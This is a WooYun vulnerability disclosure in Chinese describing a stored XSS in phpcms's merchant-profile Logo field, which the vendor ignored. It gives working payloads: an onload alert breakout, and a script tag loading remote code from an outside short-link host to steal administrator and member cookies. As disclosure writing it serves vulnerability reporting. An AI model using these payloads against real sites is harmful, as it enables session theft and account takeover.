漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-084564
漏洞标题:phpcms储存型XSS(demo+本地)
相关厂商:phpcms
漏洞作者: 路人甲
提交时间:2014-11-27 14:50
修复时间:2015-01-03 14:52
公开时间:2015-01-03 14:52
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-27: 细节已通知厂商并且等待厂商处理中
2014-12-02: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-01-03: 细节向公众公开
简要描述:
有点小障碍,rank评低点吧,不晓得有木有钱哈,话说还没拿到过一次有钱的
详细说明:
存在XSS的地方在会员中心--商务中心--商家资料--我的资料--Logo那里,demo+本地演示哦~
这个属于过滤不严格的问题,本来Logo那里是插入图片url的,但是试了一下直接插XSS也是可以的,我直接插入<body/onload=alert(1)>可以看到提示输入正确
然后我点击提交可以看到成功
接下来来到企业首页看看,可以看到并没有弹窗,那我就郁闷了,看下源码吧,原来是没有闭合
那么继续构造"/><body/onload=alert(1)>保存后重新来到企业首页看看,可以看到成功弹窗~
然后查看下源码吧,储存型的哦~
接下来看看能不能盲打后台,蛋疼的是demo没有提供官方后台演示,无奈只好本地搭建,本地搭建好以后来到后台,发现是不能成功盲打后台的
但是我又发现,这个商家资料是需要审核的,也就是说,在审核的过程中,管理员百分之九十九点九会先去我们的企业首页看吧,这样你们就都懂得了哈~在后台点击进去我们的企业首页查看的时候,可以看到成功弹窗~
再看看能不能打cookie吧,继续构造"><script src=http://t.cn/RzLE1X0></script>
可以看到cookie已经成功打到~另外由于这个企业首页不止管理员审核的时候可以看,是网站内会员人人都可以看到的哦,所以说你们懂得~
漏洞证明:
修复方案:
过滤呗
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-01-03 14:52
厂商回复:
最新状态:
暂无